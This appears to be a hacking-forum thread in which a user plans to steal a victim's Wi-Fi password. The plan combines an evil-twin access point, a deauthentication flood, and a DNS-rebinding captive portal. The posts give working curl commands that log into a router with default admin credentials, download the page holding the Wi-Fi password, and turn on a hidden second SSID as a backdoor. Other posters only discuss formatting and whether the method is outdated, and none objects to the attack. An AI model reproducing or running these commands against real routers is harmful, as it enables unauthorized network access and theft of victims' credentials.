[mooooon]

as the title says i want to perform this attack https://sinister.ly/Thread-DNS-Rebinding-Attack

using evil twin on local level

the curl command to login into the router

Code:

curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"

the curl command to get the page that contains the wifi password

Code:

curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.html

this how i was planing to perform the attack
evil twining a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it )is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and execute the dns rebinding attack to get the wifi password from his router ....

but now i don't know how will get the html file back if want to use it in local level only so the other option was
to enable the second ssid that will launch with the default password so i can just login without getting any thing back
but i tried the curl command and it didn't work

Code:

curl "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch^&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC^&IF_ERRORPARAM=SUCC^&IF_ERRORTYPE=-1^&IF_CONFIGTAG=Y^&IF_ACTION=apply^&WLAN_INSTNUM=4^&WLAN_SSID0=IGD.LD1.WLAN1^&WLAN_SSID1=IGD.LD1.WLAN2^&WLAN_SSID2=IGD.LD1.WLAN3^&WLAN_SSID3=IGD.LD1.WLAN4^&IF_SSIDATTR1=0^&IF_SSIDATTR2=0^&IF_SSIDATTR3=0^&IF_SSIDATTR4=0^&IF_VIEWID=IGD.LD1.WLAN2^&SettingStatus=CurruntSetting^&CardIsIn=1^&MaxInterface=4^&DeviceMode=InfrastructureAccessPoint^&CardMode=b^%^2Cg^%^2Cn^%^2Cbg^%^2Cgn^%^2Cbgn^&CardRev=0^&Class=255^&PID=33169^&VID=4332^&ValidIf=1^&Enable=1^&RadioStatus=NULL^&Standard=NULL^&BeaconInterval=NULL^&RtsCts=NULL^&Fragment=NULL^&DTIM=NULL^&TxPower=NULL^&CountryCode=NULL^&TxRate=NULL^&Channel=NULL^&ESSID=12345^&ESSIDPrefix=NULL^&ACLPolicy=NULL^&BeaconType=NULL^&WEPAuthMode=NULL^&WEPEncryptionLevel=NULL^&WEPKeyIndex=NULL^&WPAAuthMode=NULL^&WPAEncryptType=NULL^&WPAGroupRekey=NULL^&WPAEAPServerIp=NULL^&RadiusPort=NULL^&RadiusServerPort=NULL^&WPAEAPSecret=NULL^&PossibleChannels=NULL^&BasicDataRates=NULL^&OpDataRates=NULL^&PossibleTxRates=NULL^&OOBAccessEnabled=NULL^&BeaconEnabled=NULL^&ESSIDHideEnable=1^&RegulatoryDomain=NULL^&WlanMode=NULL^&DistanceFromRoot=NULL^&PeerBSSID=NULL^&AuthServiceMode=NULL^&QosType=NULL^&Priority=1^&UAPSDEnabled=NULL^&AutoChannelEnabled=NULL^&ChannelsInUse=NULL^&11iAuthMode=NULL^&11iEncryptType=NULL^&MaxUserNum=32^&SSIDIsolationEnable=NULL^&VapIsolationEnable=0^&Band=2.4G^&11nMode=1^&BandWidth=20Mhz^&SideBand=Lower^&11nRate=Auto^&SGIEnabled=0^&GreenField=0^&WdsMode=WDS_Disable^&Tx2Path=1^&IsPublicWiFiInterface=NULL^&MasterAuthServerIp=0.0.0.0^&MasterAuthServerPort=0^&MasterAuthServerSecret=^&Name=wlan0^&RealRF=1^&ChannelInUsed=8^&TxRateInUsed=Auto^&Bssid=54^%^3Abe^%^3A53^%^3A6a^%^3Af6^%^3Ac0^&IfStatus=Up^&UAPSDSupported=1^&WMMSupported=1^&TotalAssociations=4^&TotalBytesSent=2246220234^&TotalBytesReceived=3268409714^&TotalPacketsSent=22743088^&TotalPacketsReceived=14280169^&ErrorsSent=3057^&ErrorsReceived=0^&NonUnicastPacketsReceived=0^&UnicastPacketsSent=97163073747419137^&UnicastPacketsReceived=61100857587924993^&DiscardPacketsSent=8137^&DiscardPacketsReceived=68^&TotalPSKFailures=66^&TotalIntegrityFailures=6^&NumEasyPair=0^&ConnectStatus=Disconnected^&SingalQuality=0^&SingalStrength=0^&_SESSION_TOKEN=2714922195119803" --compressed

cause it needs to check a checkbox as i think

more about this problem
https://www.sitepoint.com/community/t/ho...ion/325785

edit i got the command working by removing every ^ from it

what do you think folks ?

[darkninja1980]

please edit your code it hard to read it.

[mooooon]

please edit your code it hard to read it.

No need to edit it .... it works as it's .

I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php...237.0.html

[Drako]

That post is 5 years old... The code and the attack could be outdated.

[darkninja1980]

please edit your code it hard to read it.

No need  to edit it .... it works as it's .

I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php...237.0.html

what I mean is like this for an example.

Code:

using System;

namespace SampleApp {
   public delegate string MyDel(string str);
    
   class EventProgram {
      event MyDel MyEvent;
        
      public EventProgram() {
         this.MyEvent += new MyDel(this.WelcomeUser);
      }
      public string WelcomeUser(string username) {
         return "Welcome " + username;
      }
      static void Main(string[] args) {
         EventProgram obj1 = new EventProgram();
         string result = obj1.MyEvent("Tutorials Point");
         Console.WriteLine(result);
      }
   }
}

[mooooon]

please edit your code it hard to read it.

No need  to edit it .... it works as it's .

I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php...237.0.html

what I mean is like this for an example.

Code:

using System;

namespace SampleApp {
  public delegate string MyDel(string str);

  class EventProgram {
     event MyDel MyEvent;

     public EventProgram() {
        this.MyEvent += new MyDel(this.WelcomeUser);
     }
     public string WelcomeUser(string username) {
        return "Welcome " + username;
     }
     static void Main(string[] args) {
        EventProgram obj1 = new EventProgram();
        string result = obj1.MyEvent("Tutorials Point");
        Console.WriteLine(result);
     }
  }
}

here is it

Code:

curl "http://192.168.1.1/getpage.gch?pid=1002&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002&nextpage=net_wlan_essid_t.gch&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&IF_CONFIGTAG=Y&IF_ACTION=apply&WLAN_INSTNUM=4&WLAN_SSID0=IGD.LD1.WLAN1&WLAN_SSID1=IGD.LD1.WLAN2&WLAN_SSID2=IGD.LD1.WLAN3&WLAN_SSID3=IGD.LD1.WLAN4&IF_SSIDATTR1=0&IF_SSIDATTR2=0&IF_SSIDATTR3=0&IF_SSIDATTR4=0&IF_VIEWID=IGD.LD1.WLAN2&SettingStatus=CurruntSetting&CardIsIn=1&MaxInterface=4&DeviceMode=InfrastructureAccessPoint&CardMode=b%2Cg%2Cn%2Cbg%2Cgn%2Cbgn&CardRev=0&Class=255&PID=33169&VID=4332&ValidIf=1&Enable=1&RadioStatus=NULL&Standard=NULL&BeaconInterval=NULL&RtsCts=NULL&Fragment=NULL&DTIM=NULL&TxPower=NULL&CountryCode=NULL&TxRate=NULL&Channel=NULL&ESSID=12345&ESSIDPrefix=NULL&ACLPolicy=NULL&BeaconType=NULL&WEPAuthMode=NULL&WEPEncryptionLevel=NULL&WEPKeyIndex=NULL&WPAAuthMode=NULL&WPAEncryptType=NULL&WPAGroupRekey=NULL&WPAEAPServerIp=NULL&RadiusPort=NULL&RadiusServerPort=NULL&WPAEAPSecret=NULL&PossibleChannels=NULL&BasicDataRates=NULL&OpDataRates=NULL&PossibleTxRates=NULL&OOBAccessEnabled=NULL&BeaconEnabled=NULL&ESSIDHideEnable=1&RegulatoryDomain=NULL&WlanMode=NULL&DistanceFromRoot=NULL&PeerBSSID=NULL&AuthServiceMode=NULL&QosType=NULL&Priority=1&UAPSDEnabled=NULL&AutoChannelEnabled=NULL&ChannelsInUse=NULL&11iAuthMode=NULL&11iEncryptType=NULL&MaxUserNum=32&SSIDIsolationEnable=NULL&VapIsolationEnable=0&Band=2.4G&11nMode=1&BandWidth=20Mhz&SideBand=Lower&11nRate=Auto&SGIEnabled=0&GreenField=0&WdsMode=WDS_Disable&Tx2Path=1&IsPublicWiFiInterface=NULL&MasterAuthServerIp=0.0.0.0&MasterAuthServerPort=0&MasterAuthServerSecret=&Name=wlan0&RealRF=1&ChannelInUsed=8&TxRateInUsed=Auto&Bssid=54%3Abe%3A53%3A6a%3Af6%3Ac0&IfStatus=Up&UAPSDSupported=1&WMMSupported=1&TotalAssociations=4&TotalBytesSent=2246220234&TotalBytesReceived=3268409714&TotalPacketsSent=22743088&TotalPacketsReceived=14280169&ErrorsSent=3057&ErrorsReceived=0&NonUnicastPacketsReceived=0&UnicastPacketsSent=97163073747419137&UnicastPacketsReceived=61100857587924993&DiscardPacketsSent=8137&DiscardPacketsReceived=68&TotalPSKFailures=66&TotalIntegrityFailures=6&NumEasyPair=0&ConnectStatus=Disconnected&SingalQuality=0&SingalStrength=0&_SESSION_TOKEN=5598383297501123"

and i can't edit it as it's a curl command !!

and if you mean the other code that looks like yours that @Ligeti wrote .... i don't understand it clearly so i can't edit it !

[mooooon]

That post is 5 years old... The code and the attack could be outdated.

so what do you suggest ?!

[mooooon]

That post is 5 years old... The code and the attack could be outdated.

i have tested it and all what i getting is this






and when i blocked my ip just like the article

i got this

any ideas ??

[Drako]

That post is 5 years old... The code and the attack could be outdated.

i have tested it and all what i getting is this






and when i blocked my ip just like the article

i  got  this

any ideas ??

Well like I said, the code is probably way outdated. I can't really suggest anything there.

[mooooon]

That post is 5 years old... The code and the attack could be outdated.

i have tested it and all what i getting is this






and when i blocked my ip just like the article

i  got  this

any ideas ??

Well like I said, the code is probably way outdated. I can't really suggest anything there.

what should i do now